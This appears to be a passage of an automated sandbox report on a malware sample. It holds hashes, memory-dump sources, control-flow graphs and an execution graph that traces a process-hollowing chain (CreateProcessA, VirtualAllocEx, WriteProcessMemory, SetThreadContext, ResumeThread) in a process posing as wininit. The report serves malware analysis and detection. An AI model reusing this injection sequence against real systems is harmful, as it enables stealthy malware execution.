                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 87fabe8283b0dda062bbfc787c07ee53038d36ef0d65098125ee620f271cd5cc
                                                                                                                                • Instruction ID: a67de7cfede25c1879bd25b8f5bb5a4e65d139cc6e04b81ba32c83bc5bcaf1ba
                                                                                                                                • Opcode Fuzzy Hash: 87fabe8283b0dda062bbfc787c07ee53038d36ef0d65098125ee620f271cd5cc
                                                                                                                                • Instruction Fuzzy Hash: 3B21361690E7E01EE703AB3CA9751D97F308E43228B0A15E7C5D0CF4B3D549584DC7AA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1701289944.000000000359D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0359D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_359d000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e58ac75d5d05ff348bfd8a77f3e8525986f9a0342438b42bed91d7dfee2d69e5
                                                                                                                                • Instruction ID: 8e52321b26acfdecb26c0db47a19bafa87ecdf46327056661e7d0f0738f37774
                                                                                                                                • Opcode Fuzzy Hash: e58ac75d5d05ff348bfd8a77f3e8525986f9a0342438b42bed91d7dfee2d69e5
                                                                                                                                • Instruction Fuzzy Hash: 4301D4710093009AFB10CA26DD84767FFE8FF41324F0CC56BEC494A166D2799841C6B1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1701289944.000000000359D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0359D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_359d000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4214b282d631a6573ad812e825fa559253e8cf3fd5f0cd0673bae59ce295c80d
                                                                                                                                • Instruction ID: 7a9aa84a7d8ae0aa2412f0a8096f73d732666bbdeed298a5b054d99ab4d5ed64
                                                                                                                                • Opcode Fuzzy Hash: 4214b282d631a6573ad812e825fa559253e8cf3fd5f0cd0673bae59ce295c80d
                                                                                                                                • Instruction Fuzzy Hash: 18012D6100E3C09FE7128B259C94B56BFB4EF47224F1D80CBD8888F1A3C2699845C772
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1701566645.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f0d7ef22e88c4982de2aa6cdbd0bee583ed0f0e00bb98df448bb527718442b66
                                                                                                                                • Instruction ID: 34293b859ae979dc9db0e91d48da4ac147ebc95264f9710a2457b5ddf5e2ad36
                                                                                                                                • Opcode Fuzzy Hash: f0d7ef22e88c4982de2aa6cdbd0bee583ed0f0e00bb98df448bb527718442b66
                                                                                                                                • Instruction Fuzzy Hash: 080184B8B002199FDB04CB98D480AADF771FF8D300B208259D85A9B375C735EC438B50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1705441668.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d60000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'iq$4'iq$tPiq$tPiq$$iq$$iq$$iq
                                                                                                                                • API String ID: 0-4154970031
                                                                                                                                • Opcode ID: 451339e378cba7ec63f37a09fd358fcd801053de6140ea6bee40ba5fad38c0eb
                                                                                                                                • Instruction ID: bb615d52e147a03c1527289c97e583d888723f97cc6a1ed706be8723099bf0b4
                                                                                                                                • Opcode Fuzzy Hash: 451339e378cba7ec63f37a09fd358fcd801053de6140ea6bee40ba5fad38c0eb
                                                                                                                                • Instruction Fuzzy Hash: 16F115B5B0021A8FDB218B69940466AFBF6AFD5320F18807AD44ACF355EB33DD45C7A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1705441668.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d60000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'iq$4'iq$tPiq$tPiq$$iq$$iq$$iq
                                                                                                                                • API String ID: 0-4154970031
                                                                                                                                • Opcode ID: f4e53354e88879f1921d0f7c8fc7b43a539a2fda6af3db147518d23c57b7f0bb
                                                                                                                                • Instruction ID: 231a86edcdce7a5ea3a24e6146b7851c375d8a88e0ce5361f4b548a50995f4a2
                                                                                                                                • Opcode Fuzzy Hash: f4e53354e88879f1921d0f7c8fc7b43a539a2fda6af3db147518d23c57b7f0bb
                                                                                                                                • Instruction Fuzzy Hash: A2A135B17043168FCB259B69D814A7BFBA6AFC5620F18807BD485CB391DA31CC45CBE1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1705441668.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d60000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $iq$$iq$$iq$$iq
                                                                                                                                • API String ID: 0-3711049672
                                                                                                                                • Opcode ID: 9c51a56b91cef00d0262437728e667560277667ca6e77d92f038dcd62a97a39d
                                                                                                                                • Instruction ID: 05abf96ffb0a1fbfcd015c45c82b9c3353db8c8773666a31cde29fc35d161859
                                                                                                                                • Opcode Fuzzy Hash: 9c51a56b91cef00d0262437728e667560277667ca6e77d92f038dcd62a97a39d
                                                                                                                                • Instruction Fuzzy Hash: B42129B17143169BDB34962E984473BEA979BCAB14F64803AE449CB3C1DD32C8458361

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:165
                                                                                                                                Total number of Limit Nodes:8
                                                                                                                                execution_graph 22089 6668364 22090 6668371 22089->22090 22094 66691c8 22090->22094 22099 66691d8 22090->22099 22091 66682f1 22095 66691ed 22094->22095 22104 6669276 22095->22104 22110 666920a 22095->22110 22096 66691ff 22096->22091 22100 66691ed 22099->22100 22102 6669276 12 API calls 22100->22102 22103 666920a 12 API calls 22100->22103 22101 66691ff 22101->22091 22102->22101 22103->22101 22105 6669204 22104->22105 22107 6669279 22104->22107 22115 6669568 22105->22115 22130 6669559 22105->22130 22106 6669256 22106->22096 22107->22096 22111 6669232 22110->22111 22113 6669568 12 API calls 22111->22113 22114 6669559 12 API calls 22111->22114 22112 6669256 22112->22096 22113->22112 22114->22112 22116 666957d 22115->22116 22145 66697e8 22116->22145 22152 6669e5b 22116->22152 22156 666967a 22116->22156 22161 6669bad 22116->22161 22166 666981c 22116->22166 22170 66696f1 22116->22170 22176 66699f5 22116->22176 22181 6669c77 22116->22181 22186 66699b7 22116->22186 22192 6669f27 22116->22192 22197 6669d87 22116->22197 22201 6669a38 22116->22201 22117 666958f 22117->22106 22131 6669568 22130->22131 22133 6669d87 2 API calls 22131->22133 22134 6669f27 2 API calls 22131->22134 22135 66699b7 2 API calls 22131->22135 22136 6669c77 2 API calls 22131->22136 22137 66699f5 2 API calls 22131->22137 22138 66696f1 2 API calls 22131->22138 22139 666981c 2 API calls 22131->22139 22140 6669bad 2 API calls 22131->22140 22141 666967a 2 API calls 22131->22141 22142 6669e5b 2 API calls 22131->22142 22143 66697e8 4 API calls 22131->22143 22144 6669a38 2 API calls 22131->22144 22132 666958f 22132->22106 22133->22132 22134->22132 22135->22132 22136->22132 22137->22132 22138->22132 22139->22132 22140->22132 22141->22132 22142->22132 22143->22132 22144->22132 22206 6667b60 22145->22206 22210 6667b68 22145->22210 22146 6669806 22147 6669960 22146->22147 22214 6667c20 22146->22214 22218 6667c28 22146->22218 22147->22117 22222 6667a90 22152->22222 22226 6667a8a 22152->22226 22153 6669e75 22157 6669684 22156->22157 22230 6667eb0 22157->22230 22234 6667ea5 22157->22234 22162 6669bc8 22161->22162 22238 66675a0 22162->22238 22242 66675a8 22162->22242 22163 6669bdd 22163->22117 22168 6667a90 Wow64SetThreadContext 22166->22168 22169 6667a8a Wow64SetThreadContext 22166->22169 22167 6669836 22167->22117 22168->22167 22169->22167 22171 6669684 22170->22171 22172 666966d 22171->22172 22174 6667ea5 CreateProcessA 22171->22174 22175 6667eb0 CreateProcessA 22171->22175 22172->22117 22173 666972c 22173->22117 22174->22173 22175->22173 22177 66699fe 22176->22177 22178 6669f75 22177->22178 22179 6667c20 WriteProcessMemory 22177->22179 22180 6667c28 WriteProcessMemory 22177->22180 22179->22178 22180->22178 22182 6669bf9 22181->22182 22183 6669960 22182->22183 22184 6667c20 WriteProcessMemory 22182->22184 22185 6667c28 WriteProcessMemory 22182->22185 22183->22117 22184->22182 22185->22182 22187 66699d6 22186->22187 22188 6669fc2 22187->22188 22190 66675a0 ResumeThread 22187->22190 22191 66675a8 ResumeThread 22187->22191 22188->22117 22189 6669bdd 22189->22117 22190->22189 22191->22189 22193 6669f75 22192->22193 22194 6669f2e 22192->22194 22195 6667c20 WriteProcessMemory 22194->22195 22196 6667c28 WriteProcessMemory 22194->22196 22195->22193 22196->22193 22199 6667c20 WriteProcessMemory 22197->22199 22200 6667c28 WriteProcessMemory 22197->22200 22198 6669ba6 22199->22198 22200->22198 22202 6669cd7 22201->22202 22246 6667d10 22202->22246 22250 6667d18 22202->22250 22203 6669757 22203->22117 22207 6667ba8 VirtualAllocEx 22206->22207 22209 6667be5 22207->22209 22209->22146 22211 6667ba8 VirtualAllocEx 22210->22211 22213 6667be5 22211->22213 22213->22146 22215 6667c28 WriteProcessMemory 22214->22215 22217 6667cc7 22215->22217 22217->22146 22219 6667c70 WriteProcessMemory 22218->22219 22221 6667cc7 22219->22221 22221->22146 22223 6667ad5 Wow64SetThreadContext 22222->22223 22225 6667b1d 22223->22225 22225->22153 22227 6667a90 Wow64SetThreadContext 22226->22227 22229 6667b1d 22227->22229 22229->22153 22231 6667f39 CreateProcessA 22230->22231 22233 66680fb 22231->22233 22235 6667eb0 CreateProcessA 22234->22235 22237 66680fb 22235->22237 22239 66675a8 ResumeThread 22238->22239 22241 6667619 22239->22241 22241->22163 22243 66675e8 ResumeThread 22242->22243 22245 6667619 22243->22245 22245->22163 22247 6667d63 ReadProcessMemory 22246->22247 22249 6667da7 22247->22249 22249->22203 22251 6667d63 ReadProcessMemory 22250->22251 22253 6667da7 22251->22253 22253->22203 22254 254ac10 22255 254ac1f 22254->22255 22258 254acf8 22254->22258 22263 254ad08 22254->22263 22259 254ad3c 22258->22259 22261 254ad19 22258->22261 22259->22255 22260 254af40 GetModuleHandleW 22262 254af6d 22260->22262 22261->22259 22261->22260 22262->22255 22264 254ad19 22263->22264 22265 254ad3c 22263->22265 22264->22265 22266 254af40 GetModuleHandleW 22264->22266 22265->22255 22267 254af6d 22266->22267 22267->22255 22268 254cfa0 22269 254cfe6 22268->22269 22273 254d588 22269->22273 22276 254d578 22269->22276 22270 254d0d3 22274 254d5b6 22273->22274 22279 254d1dc 22273->22279 22274->22270 22277 254d1dc DuplicateHandle 22276->22277 22278 254d5b6 22277->22278 22278->22270 22280 254d5f0 DuplicateHandle 22279->22280 22281 254d686 22280->22281 22281->22274 22282 2544668 22283 2544672 22282->22283 22285 2544758 22282->22285 22286 254477d 22285->22286 22290 2544858 22286->22290 22294 2544868 22286->22294 22292 254488f 22290->22292 22291 254496c 22292->22291 22298 25444b0 22292->22298 22296 254488f 22294->22296 22295 254496c 22296->22295 22297 25444b0 CreateActCtxA 22296->22297 22297->22295 22299 25458f8 CreateActCtxA 22298->22299 22301 25459bb 22299->22301 22302 666a438 22303 666a5c3 22302->22303 22304 666a45e 22302->22304 22304->22303 22306 6664810 22304->22306 22307 666a6b8 PostMessageW 22306->22307 22308 666a724 22307->22308 22308->22304
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e2d7b6ae3e488eb2beed68880a1b1e6cc07a5b66c26b94e415c4776ea0a9d7ce
                                                                                                                                • Instruction ID: 013683507516fd3d8e881858db5c25256fe7022b6cc286ad4abf59711bca18a8
                                                                                                                                • Opcode Fuzzy Hash: e2d7b6ae3e488eb2beed68880a1b1e6cc07a5b66c26b94e415c4776ea0a9d7ce
                                                                                                                                • Instruction Fuzzy Hash: FE328930B01204DFDB99DB6AE560BAEBBF6AF89704F144469E106DB3A5CB35ED01CB50

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 378 6667ea5-6667f45 381 6667f47-6667f51 378->381 382 6667f7e-6667f9e 378->382 381->382 383 6667f53-6667f55 381->383 389 6667fd7-6668006 382->389 390 6667fa0-6667faa 382->390 385 6667f57-6667f61 383->385 386 6667f78-6667f7b 383->386 387 6667f65-6667f74 385->387 388 6667f63 385->388 386->382 387->387 391 6667f76 387->391 388->387 396 666803f-66680f9 CreateProcessA 389->396 397 6668008-6668012 389->397 390->389 392 6667fac-6667fae 390->392 391->386 394 6667fb0-6667fba 392->394 395 6667fd1-6667fd4 392->395 398 6667fbe-6667fcd 394->398 399 6667fbc 394->399 395->389 410 6668102-6668188 396->410 411 66680fb-6668101 396->411 397->396 400 6668014-6668016 397->400 398->398 401 6667fcf 398->401 399->398 402 6668018-6668022 400->402 403 6668039-666803c 400->403 401->395 405 6668026-6668035 402->405 406 6668024 402->406 403->396 405->405 407 6668037 405->407 406->405 407->403 421 666818a-666818e 410->421 422 6668198-666819c 410->422 411->410 421->422 423 6668190 421->423 424 666819e-66681a2 422->424 425 66681ac-66681b0 422->425 423->422 424->425 426 66681a4 424->426 427 66681b2-66681b6 425->427 428 66681c0-66681c4 425->428 426->425 427->428 429 66681b8 427->429 430 66681d6-66681dd 428->430 431 66681c6-66681cc 428->431 429->428 432 66681f4 430->432 433 66681df-66681ee 430->433 431->430 435 66681f5 432->435 433->432 435->435
                                                                                                                                APIs
                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 066680E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 963392458-0
                                                                                                                                • Opcode ID: 5ef9344f4d688dcb2219e8ba25e13de9d7e31f77d7d68ec2f890c36fd50369d8
                                                                                                                                • Instruction ID: d5058f2dd3648ec41d82d0b4f6b4ea413c80ff03341e6faaf616d878c67cf565
                                                                                                                                • Opcode Fuzzy Hash: 5ef9344f4d688dcb2219e8ba25e13de9d7e31f77d7d68ec2f890c36fd50369d8
                                                                                                                                • Instruction Fuzzy Hash: B7916D71D0021ADFDB50CFA9D841BEDBBB2BF48314F1485A9E818A7350DB749985CFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 436 6667eb0-6667f45 438 6667f47-6667f51 436->438 439 6667f7e-6667f9e 436->439 438->439 440 6667f53-6667f55 438->440 446 6667fd7-6668006 439->446 447 6667fa0-6667faa 439->447 442 6667f57-6667f61 440->442 443 6667f78-6667f7b 440->443 444 6667f65-6667f74 442->444 445 6667f63 442->445 443->439 444->444 448 6667f76 444->448 445->444 453 666803f-66680f9 CreateProcessA 446->453 454 6668008-6668012 446->454 447->446 449 6667fac-6667fae 447->449 448->443 451 6667fb0-6667fba 449->451 452 6667fd1-6667fd4 449->452 455 6667fbe-6667fcd 451->455 456 6667fbc 451->456 452->446 467 6668102-6668188 453->467 468 66680fb-6668101 453->468 454->453 457 6668014-6668016 454->457 455->455 458 6667fcf 455->458 456->455 459 6668018-6668022 457->459 460 6668039-666803c 457->460 458->452 462 6668026-6668035 459->462 463 6668024 459->463 460->453 462->462 464 6668037 462->464 463->462 464->460 478 666818a-666818e 467->478 479 6668198-666819c 467->479 468->467 478->479 480 6668190 478->480 481 666819e-66681a2 479->481 482 66681ac-66681b0 479->482 480->479 481->482 483 66681a4 481->483 484 66681b2-66681b6 482->484 485 66681c0-66681c4 482->485 483->482 484->485 486 66681b8 484->486 487 66681d6-66681dd 485->487 488 66681c6-66681cc 485->488 486->485 489 66681f4 487->489 490 66681df-66681ee 487->490 488->487 492 66681f5 489->492 490->489 492->492
                                                                                                                                APIs
                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 066680E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 963392458-0
                                                                                                                                • Opcode ID: 968e49ef692aae7eff6ae0c32a53ad4a354f4cd3d0fa773e61f587d8532e7db0
                                                                                                                                • Instruction ID: 067895800e38d1862debff7b6720cc49b998d264837a6a570626b63f197d4016
                                                                                                                                • Opcode Fuzzy Hash: 968e49ef692aae7eff6ae0c32a53ad4a354f4cd3d0fa773e61f587d8532e7db0
                                                                                                                                • Instruction Fuzzy Hash: 95917C71D0021ADFDB60CFA9D841BEDBBB2BF48314F1485A9E818A7350DB749985CFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 493 254ad08-254ad17 494 254ad43-254ad47 493->494 495 254ad19-254ad26 call 254a02c 493->495 497 254ad49-254ad53 494->497 498 254ad5b-254ad9c 494->498 500 254ad3c 495->500 501 254ad28 495->501 497->498 504 254ad9e-254ada6 498->504 505 254ada9-254adb7 498->505 500->494 550 254ad2e call 254af90 501->550 551 254ad2e call 254afa0 501->551 504->505 506 254adb9-254adbe 505->506 507 254addb-254addd 505->507 509 254adc0-254adc7 call 254a038 506->509 510 254adc9 506->510 512 254ade0-254ade7 507->512 508 254ad34-254ad36 508->500 511 254ae78-254af38 508->511 516 254adcb-254add9 509->516 510->516 543 254af40-254af6b GetModuleHandleW 511->543 544 254af3a-254af3d 511->544 514 254adf4-254adfb 512->514 515 254ade9-254adf1 512->515 518 254adfd-254ae05 514->518 519 254ae08-254ae11 call 254a048 514->519 515->514 516->512 518->519 524 254ae13-254ae1b 519->524 525 254ae1e-254ae23 519->525 524->525 527 254ae25-254ae2c 525->527 528 254ae41-254ae45 525->528 527->528 529 254ae2e-254ae3e call 254a058 call 254a068 527->529 548 254ae48 call 254b270 528->548 549 254ae48 call 254b2a0 528->549 529->528 532 254ae4b-254ae4e 534 254ae50-254ae6e 532->534 535 254ae71-254ae77 532->535 534->535 545 254af74-254af88 543->545 546 254af6d-254af73 543->546 544->543 546->545 548->532 549->532 550->508 551->508
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0254AF5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1795011625.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_2540000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 4f9df434b284d608cfbdc1a1a9f0662a713dbee58c2667b68d547d0064e12b1a
                                                                                                                                • Instruction ID: f806a79ff3f1b72ed141233a8ca5f62c97c37000084158d1d93649f2dfda2d97
                                                                                                                                • Opcode Fuzzy Hash: 4f9df434b284d608cfbdc1a1a9f0662a713dbee58c2667b68d547d0064e12b1a
                                                                                                                                • Instruction Fuzzy Hash: 15713270A00B058FD764DF29C05075AFBF1FF88708F008A2DD49A97A50DB35E94ACB94

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 552 25458ec-254596c 554 254596f-25459b9 CreateActCtxA 552->554 556 25459c2-2545a1c 554->556 557 25459bb-25459c1 554->557 564 2545a1e-2545a21 556->564 565 2545a2b-2545a2f 556->565 557->556 564->565 566 2545a40-2545a70 565->566 567 2545a31-2545a3d 565->567 571 2545a22-2545a27 566->571 572 2545a72-2545af4 566->572 567->566 571->565
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 025459A9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1795011625.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_2540000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: eb2532ab7f81e0fb2c7b50e681a49a47769a0bc6b3534066aa3d1db5e06c8f9f
                                                                                                                                • Instruction ID: ead8c6d8547c7e38d0252522f7525ff5e2e1b7019ea89da1f14cf4deaca14cfb
                                                                                                                                • Opcode Fuzzy Hash: eb2532ab7f81e0fb2c7b50e681a49a47769a0bc6b3534066aa3d1db5e06c8f9f
                                                                                                                                • Instruction Fuzzy Hash: 134112B0C00619CFDB24DFAAC9847CDFBB5BF48308F20805AD419AB251EB75694ACF90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 575 25444b0-25459b9 CreateActCtxA 579 25459c2-2545a1c 575->579 580 25459bb-25459c1 575->580 587 2545a1e-2545a21 579->587 588 2545a2b-2545a2f 579->588 580->579 587->588 589 2545a40-2545a70 588->589 590 2545a31-2545a3d 588->590 594 2545a22-2545a27 589->594 595 2545a72-2545af4 589->595 590->589 594->588
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 025459A9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1795011625.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_2540000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 8737216de64ad7c7712253346703f0b8dfa5298a2f80fd4bfa532c131f02bafc
                                                                                                                                • Instruction ID: 7d76580bd03ac8078f3490c367cccb67e75d281c03f3cad7c431933cbf7f868e
                                                                                                                                • Opcode Fuzzy Hash: 8737216de64ad7c7712253346703f0b8dfa5298a2f80fd4bfa532c131f02bafc
                                                                                                                                • Instruction Fuzzy Hash: AC41D2B0C0071DCBDB24DFA9C94478EFBB5BF49308F60806AD409AB255EB756949CF90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 598 2545a64-2545a70 599 2545a22-2545a27 598->599 600 2545a72-2545af4 598->600 603 2545a2b-2545a2f 599->603 604 2545a40-2545a41 603->604 605 2545a31-2545a3d 603->605 604->598 605->604
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1795011625.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_2540000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: de5dde97ceabfa5da24aefb3355bb94ac1e9264c44de077dbb062399a4fb4dbf
                                                                                                                                • Instruction ID: 5d7f65aeeacb1f6fd3fa89151f88f020a65393cd1da78edca44127a59393b092
                                                                                                                                • Opcode Fuzzy Hash: de5dde97ceabfa5da24aefb3355bb94ac1e9264c44de077dbb062399a4fb4dbf
                                                                                                                                • Instruction Fuzzy Hash: A731DEB0804649CFEB11DFA8C4447DEFBF0FF56308F94818AD006AB265EB79994ACB41

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 608 6667c20-6667c76 611 6667c86-6667cc5 WriteProcessMemory 608->611 612 6667c78-6667c84 608->612 614 6667cc7-6667ccd 611->614 615 6667cce-6667cfe 611->615 612->611 614->615
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06667CB8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                • Opcode ID: f0f5be36dbcd793cf5383e304458d797a38a6602465877bf71204134354d1ebf
                                                                                                                                • Instruction ID: d0710aa8b1bf4d3c93154c4ca5d9788aab88b41981f4b8f7672ba6beca037472
                                                                                                                                • Opcode Fuzzy Hash: f0f5be36dbcd793cf5383e304458d797a38a6602465877bf71204134354d1ebf
                                                                                                                                • Instruction Fuzzy Hash: 2A2135B19003199FCB10DFAAC985BDEBFF5FB48324F108429E959A7350D7789944CBA4

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 619 6667c28-6667c76 621 6667c86-6667cc5 WriteProcessMemory 619->621 622 6667c78-6667c84 619->622 624 6667cc7-6667ccd 621->624 625 6667cce-6667cfe 621->625 622->621 624->625
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06667CB8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                • Opcode ID: 5d75eb2def0eb48a1c7d0fc4f9ecccd041582533f7664380cbb87aeda2888c5a
                                                                                                                                • Instruction ID: b00fdcd33bd43869b4b2c3db1093266e716a494199226e72b8ab531eae6bb875
                                                                                                                                • Opcode Fuzzy Hash: 5d75eb2def0eb48a1c7d0fc4f9ecccd041582533f7664380cbb87aeda2888c5a
                                                                                                                                • Instruction Fuzzy Hash: A62146B19003199FCB10CFAAC981BDEBBF5FF48314F108429E959A7350D7789944CBA4

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 629 254d1dc-254d684 DuplicateHandle 631 254d686-254d68c 629->631 632 254d68d-254d6aa 629->632 631->632
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0254D5B6,?,?,?,?,?), ref: 0254D677
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1795011625.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_2540000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 8b4bf8dbec0d806f53bebf86fd434a54c794901b13b290a98e673c7e8c0f08cf
                                                                                                                                • Instruction ID: 16e7f0cfe250a3996ed0b7b3f9794aee60102ecc48bdb89e300c9e2bbd8018d8
                                                                                                                                • Opcode Fuzzy Hash: 8b4bf8dbec0d806f53bebf86fd434a54c794901b13b290a98e673c7e8c0f08cf
                                                                                                                                • Instruction Fuzzy Hash: 782103B5901208AFDB10CF9AD584ADEFBF8FB48314F14801AE918A7310D774A940CFA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
